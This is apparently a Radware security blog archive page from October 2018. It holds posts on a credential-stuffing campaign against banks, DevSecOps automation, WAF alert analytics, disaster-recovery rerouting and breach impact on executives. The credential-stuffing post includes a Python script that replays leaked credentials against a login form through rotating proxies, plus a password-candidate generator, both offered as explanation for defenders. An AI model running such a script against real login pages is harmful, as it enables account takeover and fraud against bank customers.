Credential Stuffing Campaign Targets Financial Services

October 23, 2018 — by Daniel Smith

Over the last few weeks, Radware has been tracking a significant Credential Stuffing Campaign targeting the financial industry in the United States and Europe.

Background

Credential Stuffing is an emerging threat in 2018 that continues to accelerate as more breaches occur. Today, a breach doesn’t just impact the compromised organization and its users, but it also affects every other website that the users may use.

Additionally, resetting passwords for a compromised application will only solve the problem locally while criminals are still able to leverage those credentials externally against other applications due to poor user credential hygiene.

Credential Stuffing is a subset of brute force attacks but is different from Credential Cracking. Credential Stuffing campaigns do not involve brute forcing password combinations. Instead, they leverage leaked usernames and passwords in an automated fashion against numerous websites in an attempt to take over users' accounts, exploiting credential reuse.

Criminals, like researchers, collect and data mine leaked databases and breached accounts for several reasons. Typically, cybercriminals will keep this information for future targeted attacks, sell it for profit or exploit it in fraudulent ways.

The motivations behind the current campaign that Radware is seeing are strictly fraud related. Criminals are using credentials from prior data breaches in an attempt to gain access to and take over users' bank accounts. These attackers have been seen targeting financial organizations in both the United States and Europe. When significant breaches occur, the compromised email addresses and passwords are quickly leveraged by cybercriminals. Armed with tens of millions of credentials from a recently breached website, attackers will use those credentials, along with scripts and proxies, to distribute their attack in an automated fashion against financial institutions in an attempt to take over banking accounts. These login attempts can happen in such volumes that they resemble a Distributed Denial of Service (DDoS) attack.

Attack Methods

Credential Stuffing is one of the most commonly used attack vectors by cybercriminals today. It's an automated attack in which criminals inject lists of breached credentials into login pages in an attempt to gain access to, and take over, accounts across different platforms, exploiting poor credential hygiene. Attackers route their login requests through proxy servers to avoid having their IP addresses blacklisted.

Attackers automate the logins of millions of previously discovered credentials with general-purpose automation tools like cURL and PhantomJS, or with tools designed specifically for the attack, like Sentry MBA and SNIPR.
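
To see why these campaigns are so easy to industrialize, consider a minimal sketch of the replay loop such tools automate. The target URL, form field names and proxy list below are hypothetical placeholders, not a real interface:

```python
# Illustrative sketch only: replaying a leaked credential list against a login
# form. Running anything like this against systems you do not own is illegal.
import requests

LOGIN_URL = "https://bank.example.com/login"            # hypothetical target
PROXIES = ["http://proxy1:8080", "http://proxy2:8080"]  # rotated to evade IP blacklists

def try_credentials(leak_file):
    for i, line in enumerate(open(leak_file)):
        user, password = line.rstrip("\n").split(":", 1)
        proxy = PROXIES[i % len(PROXIES)]   # distribute requests across proxies
        resp = requests.post(
            LOGIN_URL,
            data={"username": user, "password": password},
            proxies={"https": proxy},
            timeout=5,
        )
        # A non-error reply that isn't the login page again signals a "hit";
        # millions of such requests are why the traffic resembles a DDoS attack.
        if resp.ok and "Invalid credentials" not in resp.text:
            print("possible account takeover:", user)
```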

This threat is dangerous to both consumers and organizations due to the ripple effect caused by data breaches. When a company is breached, the compromised credentials will either be used by the attacker or sold to other cybercriminals. Once the credentials reach their final destination, a for-profit criminal will use that data, or credentials obtained from a leak site, in an attempt to take over user accounts on multiple websites like social media, banking, and marketplaces. In addition to the threat of fraud and identity theft to the consumer, organizations have to mitigate credential stuffing campaigns that generate high volumes of login requests, eating up resources and bandwidth in the process.

Credential Cracking

Credential Cracking attacks are automated web attacks in which criminals attempt to crack users' passwords or PINs by processing all possible combinations of characters in sequence. These attacks are only possible when applications do not have a lockout policy for failed login attempts.

Attackers will use a list of common words or recently leaked passwords in an automated fashion in an attempt to take over a specific account. Cracking software will attempt to discover the user's password by mutating and brute forcing values until the attacker is successfully authenticated.
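
To illustrate the scale of "all possible combinations," here is a minimal sketch of sequential candidate generation; the arithmetic in the comments is the real point, and also why a failed-login lockout policy defeats this class of attack:

```python
# Sketch of the exhaustive-search idea behind credential cracking: enumerate
# every candidate in sequence. Even lowercase-only 8-character passwords yield
# 26**8 (about 2.1e11) candidates, which is infeasible to walk through when an
# application locks the account after a handful of failed attempts.
import itertools
import string

def candidates(alphabet=string.ascii_lowercase, max_len=4):
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            yield "".join(combo)

# First few candidates in sequence: a, b, c, d, e
print(list(itertools.islice(candidates(), 5)))
```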

Targets

In recent campaigns, Radware has seen financial institutions targeted in both the United States and Europe by Credential Stuffing campaigns.

Crimeware

Sentry MBA – Password Stuffing Toolkit

Sentry MBA is one of the most popular Credential Stuffing toolkits used by cybercriminals today. This tool is hosted on the Sentry MBA crackers forum. The tool simplifies and automates the process of checking credentials across multiple websites and allows the attackers to configure a proxy list so they can anonymize their login requests.

SNIPR – Credential Stuffing Toolkit

SNIPR is a popular Credential Stuffing toolkit used by cybercriminals and is found hosted on the SNIPR crackers forums. SNIPR comes with over 100 config files preloaded and the ability to upload personal config files to the public repository.

Reasons for Concern

Recent breaches over the last few years have exposed hundreds of millions of user credentials. One of the main reasons for concern about a Credential Stuffing campaign is the impact it has on users. Users who reuse credentials across multiple websites are exposing themselves to an increased risk of fraud and identity theft.

The second concern is for organizations that have to mitigate high volumes of fraudulent login attempts that can saturate a network. This saturation is a cause for concern, as it will appear to be a DDoS attack originating from random IP addresses and a variety of sources, including those behind proxies. These requests will look like legitimate attempts since the attacker is not running a brute force attack. If the username:password pair for an account does not exist or fails to authenticate on the targeted application, the program simply moves on to the next set of credentials.

Mitigation

In order to defend against a Credential Stuffing campaign, organizations need to deploy a WAF that can properly fingerprint and identify malicious bot traffic, as well as automated login attacks directed at their web applications. Radware's AppWall addresses the multiple challenges posed by Credential Stuffing campaigns by introducing additional layers of mitigation, including activity tracking and source blocking.

Radware's AppWall is a Web Application Firewall (WAF) capable of securing web applications and enabling PCI compliance by mitigating web application security threats and vulnerabilities. It prevents data from leaking or being manipulated, which is critically important in regard to sensitive corporate data and information about customers.

The AppWall security filter also detects such hacking attempts by checking the replies sent from the web server for Bad/OK replies within a specific timeframe. In the event of a brute force attack, the number of Bad replies from the web server (due to a bad username, incorrect password, etc.) triggers the Brute Force security filter to monitor and take action against that specific attacker. This blocking method prevents a hacker from using automated tools to carry out an attack against a web application's login page.
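
As a rough illustration of the reply-tracking idea (a minimal sketch, not Radware's actual implementation), the logic can be modeled as a sliding window of Bad replies per source:

```python
# Minimal sketch: count failed-login ("Bad") replies per source IP inside a
# time window and block the source once a threshold is crossed.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60      # timeframe in which replies are evaluated
MAX_BAD_REPLIES = 10     # threshold before the source is blocked
failures = defaultdict(deque)
blocked = set()

def record_reply(source_ip, is_bad_reply):
    now = time.time()
    q = failures[source_ip]
    if is_bad_reply:
        q.append(now)
    # Drop failures that fell out of the window
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()
    if len(q) > MAX_BAD_REPLIES:
        blocked.add(source_ip)   # a real system would also alert and expire blocks

def is_blocked(source_ip):
    return source_ip in blocked
```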

In addition to these steps, network operators should apply two-factor authentication where eligible and monitor dumped credentials for potential leaks or threats.
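
One practical way to act on dumped credentials is to check passwords against the public Have I Been Pwned corpus via its k-anonymity range API, so the password itself never leaves your network; only the first five characters of its SHA-1 hash are sent:

```python
# Check whether a password appears in known credential dumps (HIBP range API).
import hashlib
import requests

def pwned_count(password: str) -> int:
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}", timeout=5)
    resp.raise_for_status()
    # Response lines are "SUFFIX:COUNT"; match our suffix locally.
    for line in resp.text.splitlines():
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0

# e.g. reject a new password at registration or reset time if pwned_count(pw) > 0
```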

Effective Web Application Security Essentials

  • Full OWASP Top-10 coverage against defacements, injections, etc.
  • Low false positive rate – using negative and positive security models for maximum accuracy
  • Auto policy generation capabilities for the widest coverage with the lowest operational effort
  • Bot protection and device fingerprinting capabilities to overcome dynamic IP attacks and achieve improved bot detection and blocking
  • Securing APIs by filtering paths, understanding XML and JSON schemas for enforcement, and activity tracking mechanisms to trace bots and guard internal resources
  • Flexible deployment options – on-premise, out-of-path, virtual or cloud-based

Read “Radware’s 2018 Web Application Security Report” to learn more.

DevSecOps Automation? The Roadmap

October 18, 2018 — by Benjamin Maze

In my previous blog post, I addressed the need for, and the process of, creating applications faster and building an adaptive infrastructure that suits real consumption. Today I will highlight how automation can help guarantee your security level, keep the infrastructure adaptive, and manage traffic irregularities.

How Can I Guarantee My Security Level?

By using automation, we can also guarantee a level of security on any new application by automatically deploying security rules when a new app is published. There is no risk of human error or of forgetting something; when a new app is deployed, the security is attached automatically. This is very powerful, but it needs to be very "industrial." Exceptions are not the friend of automation; it is very important to standardize applications for use with automation.

IoT is the foremost source of DDoS threats because devices and apps are provisioned very fast, with nothing comparable happening at the security level. A lot of botnets target IoT to gain access to many devices, and there are several apps and vulnerabilities that hackers can exploit to access these devices and build a very large botnet.

Radware can provide automated security services for anti-DDoS and WAF protection on top of ADC services (load balancing, SSL offload, reverse proxy, L7 modification, etc.)

How Can I Have an Adaptive Infrastructure?

With Google Kubernetes, it is very easy to add more containers (or pods) to an application in order to handle more client connections. Kubernetes has its own load balancing mechanisms to share the load between several containers. However, this service is very limited and does not provide all the features we need on a reverse proxy to expose the application to the rest of the world (NAT, SSL offload, L7 load balancing, etc.).

By using an intermediate orchestrator for L4-L7 services such as load balancing, DDoS protection and WAF, acting as an abstraction layer, the orchestrator can be notified of any changes from Kubernetes and trigger an automation workflow to update the infrastructure accordingly:

  • Modify/create/scale up/scale down an ADC service to expose the app externally with full capabilities: SSL offload, NAT, L7 modification, L7 load balancing, persistence, caching, and TCP optimization
  • Modify/create/scale up/scale down DDoS or WAF services to protect this new exposed application
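
As a hedged sketch of this pattern, the abstraction layer can watch Kubernetes for Service changes and forward them to the orchestrator's workflow API. The orchestrator URL and payload shape below are illustrative assumptions, not a documented interface:

```python
# Watch Kubernetes Services and notify an L4-L7 orchestrator over REST.
import requests
from kubernetes import client, config, watch

ORCHESTRATOR_WORKFLOW = "https://orchestrator.example.local/api/workflow/manage-virtual-service"

def follow_services():
    config.load_kube_config()                # or load_incluster_config() inside a pod
    v1 = client.CoreV1Api()
    for event in watch.Watch().stream(v1.list_service_for_all_namespaces):
        svc = event["object"]
        # Tell the orchestrator to create/update/delete the ADC, DDoS and WAF
        # services fronting the application behind this Kubernetes Service.
        requests.post(ORCHESTRATOR_WORKFLOW, json={
            "action": event["type"],         # ADDED / MODIFIED / DELETED
            "service": svc.metadata.name,
            "namespace": svc.metadata.namespace,
            "ports": [p.port for p in svc.spec.ports or []],
        }, timeout=10)
```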

How Can I Manage Exceptional Events That Temporarily Increase My Traffic?

Consider the example of a VOD service: it will be used differently depending on the time of day. It will experience huge peaks of traffic in the evening when people are watching their TVs, but during the day the traffic will decrease dramatically as most people are at work.

If you scale your application and infrastructure to manage your evening traffic peak, it will cost a lot, and that compute will sit unused during the day; this is not optimized.

With automation, we can do something smarter by provisioning compute resources in line with real needs. That means my application will run on a few servers during the day and on several servers during the evening. If I use the public cloud to host my application, I will pay only for my consumption and will not pay for a lot of computing power during the day that I don't use.

Again, this agility is needed not only at the application layer but also at the infrastructure layer. My ADC, anti-DDoS or WAF services should not be statically sized for my evening peak traffic but should adapt to my real load.

Using an intermediate automation orchestrator can provide an intelligent workflow to follow this trend. In the evening, it can automatically provision new ADC, DDoS, or WAF services on new hosts to provide more computing power and handle the larger volume of client requests, then de-provision them when they are no longer needed.
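
A toy sketch of this idea using the Kubernetes Python client follows; the deployment name and replica counts are illustrative assumptions:

```python
# Schedule-aware provisioning for the VOD example: more replicas during the
# evening peak, fewer during the daytime baseline.
from datetime import datetime
from kubernetes import client, config

def scale_for_time_of_day(name="vod-frontend", namespace="prod"):
    config.load_kube_config()
    apps = client.AppsV1Api()
    hour = datetime.now().hour
    replicas = 12 if 18 <= hour <= 23 else 3   # evening peak vs. daytime baseline
    apps.patch_namespaced_deployment_scale(
        name, namespace, {"spec": {"replicas": replicas}}
    )
    # The same trigger point is where an orchestrator would also scale the
    # fronting ADC/WAF/DDoS services and re-dispatch licenses dynamically.
```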

It is important to also have a flexible license model with a license server that dynamically dispatches the license to the ADC, WAF, or DDoS services.

Conclusion

With an intermediate orchestrator, Radware technologies can be used in complex SDDC environments. It provides an abstraction layer based on workflows that simplifies integration with external tools like Ansible, Cisco ACI, Juniper Contrail, OpenStack, and Google Kubernetes.

vDirect exposes a REST API that is used to trigger a workflow. For example, a workflow can "manage virtual service" with 3 actions:

  • Create a new virtual service (real server, server group, load balancing algorithm, health check, DDoS, WAF, etc.)
  • Modify an existing virtual service (add a real server, change DDoS rules, change load balancing algorithms, etc.)
  • Delete an existing virtual service (delete ADC, DDoS, WAF, configuration).

From an external orchestrator, the integration is very simple: only one REST call to the "manage virtual service" workflow is needed. Given all the necessary parameters, vDirect can handle all of the automation on Radware devices such as ADC, anti-DDoS, and WAF.
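
As a hedged illustration, such a call might look like the sketch below. The endpoint path and parameter names are assumptions for illustration only; consult the vDirect API documentation for the real schema:

```python
# Hypothetical single REST call to a "manage virtual service" workflow.
import requests

VDIRECT = "https://vdirect.example.local:2189"   # placeholder address

def manage_virtual_service(action, app_name, servers):
    payload = {
        "parameters": {
            "action": action,            # create / modify / delete
            "serviceName": app_name,
            "realServers": servers,      # e.g. ["10.0.0.11:8080", "10.0.0.12:8080"]
            "ddosProfile": "default",
            "wafProfile": "default",
        }
    }
    resp = requests.post(
        f"{VDIRECT}/api/workflow/manage-virtual-service/action/run",
        json=payload,
        auth=("vdirect-user", "********"),
        verify=False,   # lab sketch only; verify TLS properly in production
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()
```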

Read “Radware’s 2018 Web Application Security Report” to learn more.

DevOps: Application Automation? The Inescapable Path

October 17, 2018 — by Benjamin Maze

The world is changing. IoT is becoming more prevalent, and applications hold a prominent place in this new world. IT infrastructure carries a huge cost, and we need to find a way to optimize it.

  • How can I create apps faster?
  • How can I guarantee my security level?
  • How can I have an adaptive infrastructure that suits my real consumption?
  • How can I manage exceptional events that temporarily increase my traffic?

Automation is the answer.

How Can I Create Apps Faster?

First, we need to understand a few concepts from the cloud world.

In the world of application development, developers have several tools they can use to accelerate the development process. We all know server virtualization has been a good tool that allows us to quickly create new infrastructure to support new applications; this is the infrastructure-as-a-service (IaaS) layer of the cloud stack. But this virtualization is not fast enough: we need to provision a new OS for each virtual server, which takes a long time, and it is difficult to manage the high number of OS instances in the datacenter.

With the arrival of containers (like Docker), you get virtualization while keeping the same operating system; this is the platform-as-a-service (PaaS) level. As developers, we do not need to manage the OS, so the creation and removal of new services can be done very quickly.

One application can run on several containers that need to talk to each other. Platforms like Google Kubernetes are used to orchestrate these containers, so you can build an application running on several containers that is completely automated. Kubernetes also introduces the capability to scale an application in or out in real time according to the traffic load. That means we can imagine a VOD service like Netflix running more or fewer containers depending on the time of day, so the application uses less computing power when there are fewer viewers, which has a direct impact on its cost.
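
A minimal sketch of this scale-in/scale-out mechanism, creating a HorizontalPodAutoscaler for a hypothetical VOD deployment with the Kubernetes Python client (names and thresholds are assumptions):

```python
# Create an HPA that grows the deployment with load and shrinks it when
# viewers drop off.
from kubernetes import client, config

def create_vod_autoscaler(namespace="prod"):
    config.load_kube_config()
    hpa = client.V1HorizontalPodAutoscaler(
        metadata=client.V1ObjectMeta(name="vod-app-hpa"),
        spec=client.V1HorizontalPodAutoscalerSpec(
            scale_target_ref=client.V1CrossVersionObjectReference(
                api_version="apps/v1", kind="Deployment", name="vod-app"
            ),
            min_replicas=2,                        # overnight baseline
            max_replicas=20,                       # evening peak ceiling
            target_cpu_utilization_percentage=70,  # add pods above 70% CPU
        ),
    )
    client.AutoscalingV1Api().create_namespaced_horizontal_pod_autoscaler(namespace, hpa)
```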

We now understand why it is important to use automation at the application level, but an application does not exist only at the application level. When we publish our apps and make them available to external clients, traffic must travel through a lot of devices, such as switches, routers, firewalls, and load balancers, in order for the application to function. These devices have to be configured at the network level for the application. Historically, those elements are still very manual, not automated, which results in slow exposure of new applications and services because we need human intervention on those devices to build the configuration.

In the DevOps/SecOps domain, we try to bring automation to these network elements. Basically, we need a fully automated system that takes care of changes/additions/deletions at the application level and automatically provisions the configuration on the network elements that support the application.

Software-Defined-Data-Center

That is what we call a Software-Defined Data Center (SDDC), which introduces a kind of "intelligence" into the infrastructure. In this way, it is possible to have a dynamic infrastructure that follows requests from the application layer down to the infrastructure layer:

  • Automation of application layer based on service virtualization (container)
  • Scale in / scale-out mechanism to provision / de-provision compute according to the exact needs
  • Expose an application automatically to the customer
  • Provision all network/security configuration that is required (switch, router, load balancer, reverse proxy, DDoS, etc.)

Using an intermediate orchestrator, acting as an abstraction layer, provides a very strong tool for integration into this kind of SDDC infrastructure, with:

  • Auto-provisioning of ADC services (Alteon VA or vADC on physical Alteon)
  • Auto-provisioning of configuration triggered by an external event (new apps in Kubernetes, for example)
  • Dynamic scale in / scale out
  • Auto-provisioning of security services (DDoS, WAF)

In the next article, I will continue to answer the following questions using automation:

  • How can I guarantee my security level?
  • How can I have an adaptive infrastructure that suits my real consumption?
  • How can I manage exceptional events that temporarily increase my traffic?

Read “Radware’s 2018 Web Application Security Report” to learn more.

Using Application Analytics to Achieve Security at Scale

October 16, 2018 — by Eyal Arazi

Are you overwhelmed by the number of security events per day? If so, you are not alone.

Alert Fatigue is Leaving You Exposed

It is not uncommon for security administrators to receive tens of thousands of security alerts per day, leading to alert fatigue – and worse – security events going unattended.

Tellingly, a study conducted by the Cloud Security Alliance (CSA) found that over 40% of security professionals think alerts lack actionable intelligence that can help them resolve security events. More than 30% of security professionals ignore alerts altogether because so many of them are false positives. Similarly, a study by Fidelis Cybersecurity found that almost two-thirds of organizations review less than 25% of their alerts every day, and only 6% triage 75% or more of the alerts they receive.

As a result of this alert flood, many organizations leave the majority of their security alerts unchecked. This is a particular problem in the world of application security, as customer-facing applications frequently generate massive amounts of security events based on user activity. Although many of these events are benign, some are not, and it only takes one unattended alert to open the door to devastating security events, like a data breach.

Not examining these events in detail leaves applications (and the data they store) exposed to security vulnerabilities, false positives, and sub-optimal security policies, which go unnoticed.

Many Events, but Few Activities

The irony of this alert flood is that, when examined in detail, many alerts are in fact recurring events with discernible patterns. Examples of such recurring patterns are repeated access to a specific resource, multiple scanning attempts from the same origin IP, or execution of a known attack vector.

Traditionally, web application firewall (WAF) systems log each individual event without taking into consideration the overall context of the alert. For example, a legitimate attempt by a large group of users to access a common resource (such as a specific file or page) and clearly illegitimate repeated scanning attempts by the same source IP address would all be logged the same way: each individual event would be logged once, and not cross-linked to similar events.

How to Achieve Security at Scale

Achieving security at scale requires being able to separate the wheat from the chaff when it comes to security events: distinguishing between large volumes of routine user actions, which have little implication for application security, and high-priority alerts, which are indicative of malicious hacking attempts or may otherwise suggest a problem with security policy configuration (for example, a legitimate request being blocked).

In order to be able to make this separation, there are a number of questions that security administrators need to ask themselves:

  1. How frequently does this event occur? That is, does this behavior occur often, or is it a one-off event?
  2. What is the trend for this event? How does this type of behavior trend over time? Does it occur at a constant rate, or is there a sudden massive spike?
  3. What is the relevant header request data? What are the relevant request methods, destination URL, resource types, and source/destination details?
  4. Is this type of activity indicative of a known attack? Is there a legitimate explanation for this event, or does it usually signify an attempted attack?

Each of these questions can go either way in terms of explaining security events. However, administrators will do well to have all of this information readily available, in order to reach an informed assessment based on the overall context.

Having such tools – and taking the overall context into consideration – gives security professionals a number of significant benefits:

  • Increased visibility of security events, to better understand application behavior and focus on high-priority alerts.
  • More intelligent decision making on which events should be blocked or allowed.
  • A more effective response in order to secure applications against attacks as much as possible, while also making sure that legitimate users are not impacted.

Radware’s Application Analytics

Radware developed Application Analytics, the latest feature in Radware's Cloud WAF Service, to address these customer needs.

Radware’s Cloud WAF Application Analytics works via a process of analysis based on machine-learning algorithms, which identify patterns and group similar application events into recurring user activities:

  1. Data mapping of the log data set, to identify all potential event types
  2. Cluster analysis using machine learning algorithms to identify similar events with common characteristics
  3. Activity grouping of recurring user activities with common identifiers
  4. Data enrichment with supplemental details to provide further context on activities

Radware's Cloud WAF Application Analytics takes large numbers of recurring log events and condenses them into a small number of recurring activities.
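
As a simplified sketch of the grouping step only (the real feature relies on machine-learning cluster analysis rather than exact-match keys), recurring events can be collapsed into counted activities like this:

```python
# Collapse raw WAF log events that share common identifiers into a handful of
# recurring "activities" with counts.
from collections import Counter

def group_into_activities(events):
    """events: iterable of dicts with keys like src_ip, method, uri, rule."""
    activities = Counter(
        (e["src_ip"], e["method"], e["uri"], e["rule"]) for e in events
    )
    # Most common activities first: thousands of events typically collapse
    # into a single- or double-digit list an administrator can actually review.
    return activities.most_common()

events = [
    {"src_ip": "203.0.113.7", "method": "GET", "uri": "/admin", "rule": "scanner"},
    {"src_ip": "203.0.113.7", "method": "GET", "uri": "/admin", "rule": "scanner"},
    {"src_ip": "198.51.100.2", "method": "POST", "uri": "/login", "rule": "brute-force"},
]
for activity, count in group_into_activities(events):
    print(count, activity)
```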

In several customer trials, this capability allowed Radware to reduce the number of Cloud WAF alerts from several thousand (or even tens of thousands) to a single-digit (or double-digit) number of activities. This allows administrators to focus on the alerts that matter.

For example, one customer reduced over 8,000 log events on one of their applications into 12 activities, whereas another customer reduced more than 3,500 security events into 13 activities.

The benefits for security administrators are easy to see: rather than drowning in massive amounts of log events with little (or no) context to explain them, administrators now have a tool that reduces log overload to a manageable number of activities to analyze.

Ultimately, there is no silver bullet when it comes to WAF and application security management: administrators will always need to balance being as secure as possible (and protecting private user data) with being as accessible as possible to those same users. Cloud WAF Application Analytics is Radware's attempt to disentangle this challenge.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Disaster Recovery: Data Center or Host Infrastructure Reroute

October 11, 2018 — by Daniel Lakier

Companies, even large ones, haven't considered disaster recovery plans outside of their primary cloud provider's own infrastructure as regularly as they should. In March of this year, Amazon Web Services (AWS) had a massive failure which directly impacted some of the world's largest brands, taking them offline for several hours. In this case it was not a malicious attack, but the end result was the same: an outage.

When the organization’s leadership questioned their IT departments on how this outage could happen, most received an answer that was somehow acceptable:  It was AWS. Amazon failed, not us. However, that answer should not be acceptable.

AWS may project an image of invulnerability, but the people running IT departments are there for a reason. They are meant to be skeptics, and it is their job to build redundancies that protect the system against any single point of failure. Some of those companies use AWS disaster recovery services, but if the data center and all the technology required to turn those fail-safes on crashes, then you're down. This is why we need to treat the problem with the same logic that we use for any other system. Today it is easier than ever to create a resilient, DoS-resistant architecture that takes into account not only traditional malicious activity but also critical business failures. The solution isn't purely technical either; it needs to be based upon sound business principles using readily available technology.

[You might also like: DDoS Protection is the Foundation for Application, Site and Data Availability]

In the past, enterprise disaster recovery architecture revolved around having a fully operational secondary location; if we wanted true resiliency, that was the only option. Today, although that can still be one of the foundation pillars of your approach, it doesn't have to be the only answer. You need to be more circumspect about what your requirements are and choose the right solution for each environment/problem. For example:

  • A) You can still build it either in your own data center or in a cloud (match the performance requirements to a business value equation).
  • B) Several 'Backup-as-a-Service' providers offer more than just storage in the cloud. They offer resources for rent (servers to run your corporate environments in case of an outage). If your business can sustain an environment going down just long enough to turn it back on (several hours), this can be a very cost-effective solution.
  • C) For non-critical items, rely on the cloud provider you currently use to provide near-time failure protection.

The Bottom Line

Regardless of which approach you take, even if everything works flawlessly, you still need to address the "brownout" phenomenon: the time it takes for services to be restored at the primary or at a secondary location. It is even more important to automatically send people to a different location if performance is impaired. Many people have heard of GSLB, and while many use it today, it is not part of their comprehensive DoS approach. But it should be. If your goal with your DDoS mitigation solution is to ensure uninterrupted service in addition to meeting your approved performance SLA, then dynamic GSLB, or infrastructure-based performance load balancing, has to be an integral part of any design.
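
As a toy sketch of the decision logic behind dynamic GSLB (site URLs and thresholds are placeholders), the steering choice boils down to probing each site and skipping the ones that are down or browned out:

```python
# Probe each site, steer users to the fastest healthy one, and reroute
# automatically when a site degrades or goes down entirely.
import requests

SITES = {
    "us-east": "https://dc1.example.com/health",
    "eu-west": "https://dc2.example.com/health",
}

def pick_site(max_latency=2.0):
    best, best_latency = None, max_latency
    for name, url in SITES.items():
        try:
            resp = requests.get(url, timeout=max_latency)
            latency = resp.elapsed.total_seconds()
            if resp.ok and latency < best_latency:   # skip brownouts, not just outages
                best, best_latency = name, latency
        except requests.RequestException:
            continue                                  # site down: removed as a candidate
    return best   # a GSLB would answer DNS queries with this site's address
```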

We can deploy this technology purely defensively, as we have traditionally done with all DoS investments, or we can change the paradigm and deploy the technology to help us exceed expectations. This allows us to give each individual user the best experience possible. Radware's dynamic performance-based route optimization solution (GSLB) allows us to offer a unique customer experience to each and every user, regardless of where they are coming from, how they access the environment or what they are trying to do. This same technology allows us to reroute users in the event of a DoS event that takes down an entire site, be it from malicious behavior, hardware failure or simple human error. This functionality can be procured as a product or a service, as it is environment/cloud agnostic and relatively simple to deploy. It is not labor intensive and may be the least expensive part of an enterprise DoS architecture.

What we can conclude is that any company that blames the cloud provider for a down site in the future should be asked the hard questions because solving this problem is easier today than ever before.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Protecting Sensitive Data: A Black Swan Never Truly Sits Still

October 10, 2018 — by Mike O'Malley

The black swan – a rare and unpredictable event notorious for its ability to completely change the tides of a situation.

For cybersecurity, these nightmares can take the form of disabled critical services such as municipal electrical grids and other connected infrastructure networks, data breaches, application failures, and DDoS attacks. They can range from the level of Equifax's 2018 breach penalty fines (estimated at close to $1.5 billion), to the bankruptcy of Code Spaces following its DDoS attack and breach (one of the 61% of SMBs that faced bankruptcy, per service provider Verizon's investigations), to a government-wide shutdown of web access on public servants' computers in response to a string of cyberattacks.

Litigation and regulation can only do so much to reduce the impact of black swans, but it is up to companies to prepare and defend themselves from cyberattacks that can lead to rippling effects across industries.

[You might also like: What a Breach Means to Your Business]

If It’s So Rare, Why Should My Company Care?

Companies should concern themselves with black swans to understand the depth of the potential long-term financial and reputational damage. Radware's research on C-Suite Perspectives regarding the relationship between cybersecurity and customer experience shows that these executives prioritize customer loss (41%), brand reputation (34%) and productivity/operational loss (34%). Yet a majority of these same executives have not yet integrated security practices, such as application DevOps teams, into their company's infrastructure.

The long-term damage to a company's finances is noteworthy enough. IT provider CGI found that technology and financial companies alone can lose 5-8.5% in enterprise value from a breach. What often goes unreported, however, is the increased customer onboarding cost needed to combat large-scale customer churn following breaches.

For the financial sector, global accounting firm KPMG found that consumers not only expect institutions to act quickly and take responsibility, but 48% are willing to switch banks due to lack of responsibility and preparation for future attacks, and untimely notification of the breaches. News publication The Financial Brand found that banking customers have an average churn rate of 20-40% in 12 months, while a potential onboarding cost per customer can be within the $300-$20,000 range. Network hardware manufacturer Cisco estimates as high as 20% of customers and opportunities could be lost.

Just imagine the customer churn rate for a recently-attacked company.

How does that affect me personally as a business leader within my company?

When data breaches occur, the first person who typically takes the blame is the CISO or CSO. A common misconception, however, is that everyone else will be spared accountability. The damage is not limited to security leadership: due to the wide array of impacts that result from a cyberattack, nearly all C-level executives are at risk. Examples include Equifax CEO Richard Smith, Target CEO Gregg Steinhafel and Target CIO Beth Jacob. The result can be a sudden vacuum in the C-Suite, and with it a lack of leadership and direction that causes its own internal instability.

Today's business leaders need to understand that a data breach is no longer limited to the company's reputation but extends to the welfare of its customers. The mere event of a data breach can shatter the trust between the two entities. CEOs are now expected to be involved with managing the black swan's consequences; in times of hardship, they are particularly expected to continue being the voice of the company and to provide direction and assurance to vulnerable customers.

A business leader can be ousted from the company for not having taken cybersecurity seriously enough and/or not understanding the true costs of a cyberattack – that is, if the company hasn’t filed for bankruptcy yet.

Isn’t this something that my company’s Public Relations department should be handling?

One of the biggest contributors to the aftermath chaos of a black swan is poor or absent communication from the public relations team. By not disclosing a data breach in a timely manner, companies incur the wrath of consumers and suffer an even bigger loss in customer loyalty because of the delay. A timely announcement is expected as soon as the company discovers the incident or, according to the GDPR, within 72 hours of discovery.

A company and its CEO should not depend solely on their public relations department to handle a black swan nightmare. Equifax revealed its data breach six weeks after the incident and still hadn't directly contacted those affected, instead creating a website for customer inquiries. Equifax continues to suffer from customer distrust because of the lack of guidance from the company's leadership during those critical days in 2017. At a time of confusion and mayhem, a company's leader must remain forthcoming, reassuring and credible through the black swan's tide-changing effects.

Following a cybersecurity black swan, the vast majority of consumers must also be convinced that all the security issues have been addressed and rectified, and that the company has a plan in place should an incident recur. Those that fail to do so risk losing at least 1 in 10 customers, showing how far a black swan's impact can reach within a company, beyond the financial aspects.

How Do You Prepare for When the Black Swan Strikes?

When it comes to the black swan, the strategic method isn't limited to being proactive or reactive; it must be preemptive, according to news publication ComputerWeekly. The black swan is primarily feared for its unpredictability. The key advantage of being preemptive is the level of detail that goes into planning; instead of reacting in real time during the chaos or having a universal one-size-fits-all strategy, companies should do their best to develop multiple procedures for multiple worst-case scenarios.

Companies cannot afford to be sitting ducks waiting for the black swan to strike; they must have mitigation plans prepared for the likelihood. The ability, or inability, to mitigate extreme cyber threats and emerging cyberattack tactics cuts both ways, depending on the level of cybersecurity preparation a company possesses. By implementing a strong cybersecurity architecture (internal or third-party), companies can adapt and evolve with the constantly changing security threat landscape, thereby minimizing the opportunities for hackers to take advantage.

In addition to a well-built security system, precautions should be taken to further strengthen it, including WAF protection, SSL inspection, DDoS protection, bot protection, and more. Traditional risk management is flawed by its emphasis on internal risks only; companies must do more to account for the possibility of industry-wide black swans, such as the Target data breach in 2013 that later extended to Home Depot and other retailers.

It’s Time To Protect Sensitive Data

In the end, the potential impact of a black swan on a company comes down to its business leaders. Cybersecurity is no longer limited to the CISO's or CSO's decision; it is the CEO's as well. As the symbol and leader of a company, CEOs need to ask themselves if they know how their security model works. Is it easily penetrated? Can it defend against massive cyberattacks? What IP and customer data am I protecting? What would happen to the business if that data were breached?

Does it protect sensitive data?

Read “Radware’s 2018 Web Application Security Report” to learn more.

Consolidation in Consumer Products: Could it Solve the IoT Security Issues?

October 9, 2018 — by David Hobbs

